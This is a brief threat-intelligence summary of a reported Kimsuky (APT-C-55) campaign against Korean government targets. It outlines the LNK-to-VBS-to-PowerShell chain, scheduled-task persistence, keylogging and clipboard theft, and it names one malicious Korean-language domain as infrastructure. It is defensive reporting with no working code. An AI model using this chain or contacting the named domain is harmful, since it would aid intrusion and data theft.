360 Threat Intelligence Center reports that APT-C-55/Kimsuky used Korean-language domains in a multi-stage malware campaign. The initial LNK payload decrypted and dropped a VBS script, which downloaded additional VBS code, created a scheduled task for persistence, and fetched PowerShell used to collect host information and exfiltrate it. Later stages downloaded obfuscated PowerShell from xn--vn4b27hka971hbue.kr infrastructure to capture clipboard contents and keystrokes, while related malicious macro samples fetched payloads from Korean-domain URLs. The report characterizes the activity as part of Kimsuky’s continuing attacks against Korean government targets using social engineering, spear phishing, watering holes, malicious HWP or macro files, PE payloads, and LNK files.